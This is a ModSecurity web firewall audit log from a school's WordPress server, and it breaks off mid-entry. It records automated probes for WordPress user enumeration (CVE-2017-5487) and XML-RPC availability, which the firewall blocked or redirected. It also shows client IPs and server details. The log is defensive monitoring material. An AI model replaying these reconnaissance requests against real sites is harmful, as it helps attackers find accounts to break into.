X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0b163a56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b163a56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910623434473 14992 (- - -) Stopwatch2: 1746910623434473 14992; combined=25963, p1=426, p2=1000, p3=0, p4=0, p5=12283, sr=74, sw=0, l=0, gc=12254 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b163a56-Z-- --63704a7d-A-- [11/May/2025:03:57:11 +0700] aB-9pwpy530QiWmSS60aXgAAAFE 103.236.140.4 60458 103.236.140.4 8181 --63704a7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.33 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --63704a7d-C-- demo.sayHello --63704a7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --63704a7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910631072887 6846 (- - -) Stopwatch2: 1746910631072887 6846; combined=4994, p1=692, p2=4011, p3=42, p4=42, p5=133, sr=168, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63704a7d-Z-- --a1625658-A-- [11/May/2025:03:57:22 +0700] aB-9subs1CLLACKj-_yrFwAAAIQ 103.236.140.4 60834 103.236.140.4 8181 --a1625658-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a1625658-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1625658-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910642975330 3150 (- - -) Stopwatch2: 1746910642975330 3150; combined=1359, p1=432, p2=898, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1625658-Z-- --12f1a621-A-- [11/May/2025:03:57:34 +0700] aB-9vkEuxCpmyy5aJPlPrQAAAAo 103.236.140.4 32922 103.236.140.4 8181 --12f1a621-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --12f1a621-C-- demo.sayHello --12f1a621-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --12f1a621-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910654605837 5598 (- - -) Stopwatch2: 1746910654605837 5598; combined=4304, p1=572, p2=3511, p3=31, p4=35, p5=92, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12f1a621-Z-- --d6f24616-A-- [11/May/2025:03:57:39 +0700] aB-9w0EuxCpmyy5aJPlPtQAAABQ 103.236.140.4 33102 103.236.140.4 8181 --d6f24616-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d6f24616-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6f24616-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910659969207 2446 (- - -) Stopwatch2: 1746910659969207 2446; combined=1352, p1=497, p2=816, p3=0, p4=0, p5=38, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6f24616-Z-- --ab6a3217-A-- [11/May/2025:03:57:46 +0700] aB-9yubs1CLLACKj-_yrOgAAAJg 103.236.140.4 33332 103.236.140.4 8181 --ab6a3217-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ab6a3217-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab6a3217-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910666488079 3252 (- - -) Stopwatch2: 1746910666488079 3252; combined=1545, p1=566, p2=949, p3=0, p4=0, p5=30, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab6a3217-Z-- --367b6c04-A-- [11/May/2025:03:57:46 +0700] aB-9yubs1CLLACKj-_yrOwAAAJc 103.236.140.4 33334 103.236.140.4 8181 --367b6c04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.247 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --367b6c04-C-- demo.sayHello --367b6c04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --367b6c04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910666519150 5915 (- - -) Stopwatch2: 1746910666519150 5915; combined=4344, p1=536, p2=3544, p3=41, p4=47, p5=103, sr=75, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --367b6c04-Z-- --af3f986b-A-- [11/May/2025:03:58:01 +0700] aB-92ebs1CLLACKj-_yrjwAAAIM 103.236.140.4 33700 103.236.140.4 8181 --af3f986b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --af3f986b-C-- demo.sayHello --af3f986b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --af3f986b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910681147516 5562 (- - -) Stopwatch2: 1746910681147516 5562; combined=3869, p1=528, p2=3140, p3=34, p4=35, p5=77, sr=94, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af3f986b-Z-- --2199915e-A-- [11/May/2025:04:02:03 +0700] aB--y-bs1CLLACKj-_ytmAAAAIQ 103.236.140.4 40252 103.236.140.4 8181 --2199915e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2199915e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2199915e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910923124940 2981 (- - -) Stopwatch2: 1746910923124940 2981; combined=1581, p1=509, p2=1032, p3=0, p4=0, p5=40, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2199915e-Z-- --0a30f818-A-- [11/May/2025:04:02:12 +0700] aB--1Obs1CLLACKj-_ytpQAAAIY 103.236.140.4 40512 103.236.140.4 8181 --0a30f818-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0a30f818-C-- demo.sayHello --0a30f818-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a30f818-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910932972852 6883 (- - -) Stopwatch2: 1746910932972852 6883; combined=5200, p1=701, p2=4276, p3=31, p4=38, p5=90, sr=122, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a30f818-Z-- --80b52f64-A-- [11/May/2025:04:37:03 +0700] aB_G_-bs1CLLACKj-_y-OgAAAIY 103.236.140.4 50956 103.236.140.4 8181 --80b52f64-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --80b52f64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80b52f64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746913023850489 3486 (- - -) Stopwatch2: 1746913023850489 3486; combined=1548, p1=559, p2=952, p3=0, p4=0, p5=36, sr=134, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80b52f64-Z-- --cfb49301-A-- [11/May/2025:04:37:08 +0700] aB_HBE8xOExV7lPH_DltoQAAANc 103.236.140.4 51096 103.236.140.4 8181 --cfb49301-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.134 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cfb49301-C-- demo.sayHello --cfb49301-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfb49301-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746913028151968 5875 (- - -) Stopwatch2: 1746913028151968 5875; combined=4306, p1=535, p2=3527, p3=35, p4=35, p5=111, sr=85, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfb49301-Z-- --14869644-A-- [11/May/2025:04:38:51 +0700] aB_Ha0EuxCpmyy5aJPlj2wAAABc 103.236.140.4 54420 103.236.140.4 8181 --14869644-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --14869644-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14869644-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746913131706685 2807 (- - -) Stopwatch2: 1746913131706685 2807; combined=1323, p1=406, p2=888, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14869644-Z-- --5098085c-A-- [11/May/2025:04:38:57 +0700] aB_HcUEuxCpmyy5aJPlj5wAAAA8 103.236.140.4 54600 103.236.140.4 8181 --5098085c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5098085c-C-- demo.sayHello --5098085c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5098085c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746913137183007 6247 (- - -) Stopwatch2: 1746913137183007 6247; combined=4548, p1=558, p2=3748, p3=31, p4=36, p5=102, sr=97, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5098085c-Z-- --0051c668-A-- [11/May/2025:04:40:57 +0700] aB_H6UEuxCpmyy5aJPllIgAAAA4 103.236.140.4 58794 103.236.140.4 8181 --0051c668-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0051c668-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0051c668-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746913257821824 2468 (- - -) Stopwatch2: 1746913257821824 2468; combined=1228, p1=451, p2=740, p3=0, p4=0, p5=36, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0051c668-Z-- --b1405c48-A-- [11/May/2025:04:41:07 +0700] aB_H8wpy530QiWmSS60viAAAAEo 103.236.140.4 59304 103.236.140.4 8181 --b1405c48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.54 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b1405c48-C-- demo.sayHello --b1405c48-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1405c48-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746913267290565 4994 (- - -) Stopwatch2: 1746913267290565 4994; combined=3687, p1=495, p2=2986, p3=26, p4=30, p5=86, sr=64, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1405c48-Z-- --04f33930-A-- [11/May/2025:04:43:16 +0700] aB_IdEEuxCpmyy5aJPlnLwAAABI 103.236.140.4 36154 103.236.140.4 8181 --04f33930-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --04f33930-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04f33930-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746913396508560 2979 (- - -) Stopwatch2: 1746913396508560 2979; combined=1342, p1=411, p2=886, p3=0, p4=0, p5=44, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04f33930-Z-- --cdd0f53a-A-- [11/May/2025:04:43:23 +0700] aB_Iewpy530QiWmSS60w9gAAAFc 103.236.140.4 36378 103.236.140.4 8181 --cdd0f53a-B-- POST 